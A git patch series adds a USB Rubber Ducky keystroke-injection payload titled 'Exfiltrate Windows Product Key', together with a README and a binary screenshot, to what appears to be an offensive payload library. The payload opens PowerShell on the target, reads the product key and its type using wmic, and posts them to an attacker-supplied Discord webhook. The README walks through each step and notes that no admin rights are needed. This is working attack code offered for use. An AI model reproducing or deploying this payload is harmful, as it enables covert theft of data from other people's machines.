From 6b36c20144da354734296bde96f92254ed512abc Mon Sep 17 00:00:00 2001 From: Aleff Date: Fri, 3 Nov 2023 12:49:19 +0100 Subject: [PATCH 1/3] Exfiltrate Windows Product Key Through this payload, you can export the key information related to the Windows Product Key, knowing its type and the key itself, using a Discord Webhook. --- .../payload.txt | 59 +++++++++++++++++++ 1 file changed, 59 insertions(+) create mode 100644 payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/payload.txt diff --git a/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/payload.txt b/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/payload.txt new file mode 100644 index 0000000..a2a7c7b --- /dev/null +++ b/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/payload.txt @@ -0,0 +1,59 @@ +REM ################################################### +REM # | +REM # Title : Exfiltrate Windows Product Key | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Exfiltration | +REM # Target : Windows 10-11 | +REM # | +REM ################################################### + + +REM Put here your Discord Webhook, i.e. https://discord.com/api/webhooks/0123456789.../abcefg... +DEFINE #DISCORD-WEBHOOK example.com + +EXTENSION DETECT_READY + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + + TARGETS: + Any system that reflects CAPSLOCK will detect minimum required delay + Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms + END_REM + + REM CONFIGURATION: + DEFINE #RESPONSE_DELAY 25 + DEFINE #ITERATION_LIMIT 120 + + VAR $C = 0 + WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) + CAPSLOCK + DELAY #RESPONSE_DELAY + $C = ($C + 1) + END_WHILE + CAPSLOCK +END_EXTENSION + +GUI r +DELAY 1000 +STRING powershell +ENTER +DELAY 2000 + +STRINGLN_BLOCK + $hookUrl = "#DISCORD-WEBHOOK" + $exfiltration = @" + $(wmic path softwarelicensingservice get OA3xOriginalProductKey) + $(wmic path softwarelicensingservice get OA3xOriginalProductKeyDescription) + "@ + $payload = [PSCustomObject]@{ + content = $exfiltration + } + Invoke-RestMethod -Uri $hookUrl -Method Post -Body ($payload | ConvertTo-Json) -ContentType 'Application/Json'; exit +END_STRINGLN From b358fc582a54038ea27bdfd58c9dbb410e3fcfb2 Mon Sep 17 00:00:00 2001 From: aleff-github Date: Fri, 3 Nov 2023 12:50:00 +0100 Subject: [PATCH 2/3] README --- .../Exfiltrate_Windows_Product_Key/README.md | 91 ++++++++++++++++++ .../assets/1.png | Bin 0 -> 25861 bytes 2 files changed, 91 insertions(+) create mode 100644 payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/README.md create mode 100644 payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/assets/1.png diff --git a/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/README.md b/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/README.md new file mode 100644 index 0000000..dc6a7e2 --- /dev/null +++ b/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/README.md @@ -0,0 +1,91 @@ +# Exfiltrate Windows Product Key + +Through this payload, you can export the key information related to the Windows Product Key, knowing its type and the key itself, using a Discord Webhook. + +No administrator permissions are required to do this, isn't that absurd, right? :-) + +![](./assets/1.png) + +**Category**: Exfiltration + +## Index + +- [Introduction](#exfiltrate-windows-product-key) +- [Note](#note) +- [Dependencies](#dependencies) +- [Settings](#settings) +- [Payload Description](#payload-description) +- [Product Key Types](#product-key-types) +- [Sources](#sources) + +## Note + +Tested on: +- Windows 11 + +## Dependencies + +- Discord Webhook + +## Settings + +This portion of the payload serves as a user-defined configuration section where you should input your Discord Webhook URL. You should replace "example.com" with the actual Discord Webhook URL you want to use. The Webhook URL is the endpoint where your payload will send the acquired information related to the Windows Product Key, as well as its type, for exfiltration to a specified Discord channel or server. It's a crucial part of the payload that connects the data extraction process to your Discord platform for further analysis or actions. + +```DuckyScript +DEFINE #DISCORD-WEBHOOK example.com +``` + +## Payload Description + +Through this payload, you can export essential information related to the Windows Product Key using a Discord Webhook, ensuring that you identify its type and the key itself. + +At the beginning of the payload, the DETECT_READY extension [[1](#sources)] is used to optimize the opening of a PowerShell session on the target. + +The following commands are then executed to obtain the necessary information about the Product Key: + +1. This command retrieves the currently in-use Product Key: + + ```powershell + wmic path softwarelicensingservice get OA3xOriginalProductKey + ``` + +2. This command helps determine the type of key. You can refer to the [key types section](#key-types) for more details: + + ```powershell + wmic path softwarelicensingservice get OA3xOriginalProductKeyDescription + ``` + +The acquired information is stored in the `$exfiltration` variable, which is subsequently used to create the `$payload` object. This object is then utilized for exfiltration via a Discord Webhook. + +**Exfiltration**: + +```powershell +Invoke-RestMethod -Uri $hookUrl -Method Post -Body ($payload | ConvertTo-Json) -ContentType 'Application/Json'; exit +``` + +The `$hookUrl` variable was initialized at the beginning of the payload with the value you need to define before execution. + +## Product Key Types + +When dealing with Windows Product Keys, it's essential to understand the different types and their characteristics: + +- **OEM Keys** (*Original Equipment Manufacturer*): + + **Transferability**: Not supposed to be transferable. These keys are typically tied to the prebuilt PC on which they were originally installed. + **Usage**: Manufacturers use OEM keys to install Windows on new computers. + **Procurement**: OEM keys can sometimes be found at discount key vendors, although their use on different hardware may be challenging. + +- **Retail Keys** (*aka "Full Packaged Product" Keys*): + + **Transferability**: Transferrable. These keys can be moved from one computer to another. + **Cost**: Retail keys are often more expensive, often exceeding $100. + **Hidden Keys**: In some cases, a computer may already have a retail key, perhaps from a previous Windows upgrade. Users might not be aware of this until they check. + +Understanding these key types is crucial when working with Windows Product Keys, as it can impact their use, transferability, and compatibility with different hardware and scenarios. + +*Note: Source of this info [[2](#sources)]* + +## Sources + +- [1] Detect Ready: https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready +- [2] Is your Windows Product Key transferrable? https://www.tomshardware.com/how-to/transfer-windows-license-to-new-pc#is-your-windows-product-key-transferrable-3 \ No newline at end of file diff --git a/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/assets/1.png b/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/assets/1.png new file mode 100644 index 0000000000000000000000000000000000000000..7bdfb0e23436474664b37d073230e52687461213 GIT binary patch literal 25861 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 